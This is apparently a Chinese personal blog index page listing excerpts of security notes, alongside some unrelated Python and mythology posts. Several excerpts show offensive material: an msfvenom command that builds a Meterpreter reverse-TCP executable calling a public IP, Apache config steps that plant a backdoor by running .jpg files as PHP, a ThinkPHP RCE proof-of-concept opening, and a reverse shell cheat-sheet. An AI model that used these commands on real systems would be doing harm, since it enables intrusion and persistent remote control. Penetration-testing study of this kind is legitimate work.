会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
GGbigboy
我们这个世界,从不会给一个伤心的落伍者颁发奖牌。
管理
上一页
1
2
3
4
5
下一页
2020年2月14日
Python3正则去掉HTML标签
摘要: Python3正则去掉HTML标签 1.引用一段代码 import re html = '<pre class="line mt-10 q-content" accuse="qContent">\ 目的是通过第一次soup.find按class粗略筛选并通过soup.find_all筛选出列表中的a
阅读全文
posted @ 2020-02-14 17:22 GGbigboy
阅读(800)
评论(0)
推荐(0)
2020年2月13日
注册表读取密码
该文被密码保护。
阅读全文
posted @ 2020-02-13 22:00 GGbigboy
阅读(1)
评论(0)
推荐(0)
山海经
摘要: 山海经 古代神兽: 1六神 ▪ 青龙、白虎、朱雀、 玄武、勾陈、螣蛇 2四灵 ▪ 麒麟、 凤凰、 黄龙、龟 3四凶 ▪ 梼杌、 穷奇、 饕餮、混沌 4祥兽 ▪ 貔貅(pí xiū)、 角端、 陆吾、白泽 5凶兽 ▪ 九婴、 诸怀、 獓狠、犼、 蛊雕 6异兽 ▪ 蜚、 诸犍、矔疏、狍鸮、当扈 7龙生九
阅读全文
posted @ 2020-02-13 20:55 GGbigboy
阅读(959)
评论(0)
推荐(0)
Windwos日志分析
摘要: Windows日志分析工具 查看系统日志方法: 在“开始”菜单上,依次指向“所有程序”、“管理工具”,然后单击“事件查看器” 按 "Window+R",输入 ”eventvwr.msc“ 也可以直接进入“事件查看器” 对于Windows事件日志分析,不同的EVENT ID代表了不同的意义,摘录一些常
阅读全文
posted @ 2020-02-13 20:52 GGbigboy
阅读(473)
评论(0)
推荐(0)
奇葩后门
摘要: 奇葩后门姿势 实现条件: webshell高权限 可以执行系统命令 步骤 1.打开 Apache\conf\httpd.conf 2.搜索 AddType application/x-compress .Z 3.添加规则:AddType application/x-httpd-php .jpg 4.
阅读全文
posted @ 2020-02-13 20:49 GGbigboy
阅读(115)
评论(0)
推荐(0)
内网资料参考
摘要: 内网资料备份 获取 webshell 进内网 测试主站,搜 wooyun 历史洞未发现历史洞,github, svn, 目录扫描未发现敏感信息, 无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用 ocr 识别,找账号,通过 google,baidu,bing 等搜索
阅读全文
posted @ 2020-02-13 15:46 GGbigboy
阅读(1982)
评论(0)
推荐(0)
THINKPHP-RCE-POC
摘要: thinkphp-RCE-POC 官方公告: 1、https://blog.thinkphp.cn/869075 2、https://blog.thinkphp.cn/910675 POC: thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?
阅读全文
posted @ 2020-02-13 15:43 GGbigboy
阅读(710)
评论(0)
推荐(0)
反弹shell备忘录
摘要: 反弹shell备忘录 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网v
阅读全文
posted @ 2020-02-13 15:42 GGbigboy
阅读(216)
评论(0)
推荐(0)
Python json格式处理
摘要: Python json格式处理 首先放一段代码 import requests import jsonpath import json f=open('ip.txt','r',encoding='utf-8') for my_ip in f.readlines(): my_ip=str(my_ip[
阅读全文
posted @ 2020-02-13 15:40 GGbigboy
阅读(282)
评论(0)
推荐(0)
msf制作反弹shell
摘要: msf制作shell 1 .制作反弹shell-exe文件 执行命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe LHOST为公网IP LPORT为反弹端口
阅读全文
posted @ 2020-02-13 15:37 GGbigboy
阅读(2980)
评论(0)
推荐(0)
上一页
1
2
3
4
5
下一页
公告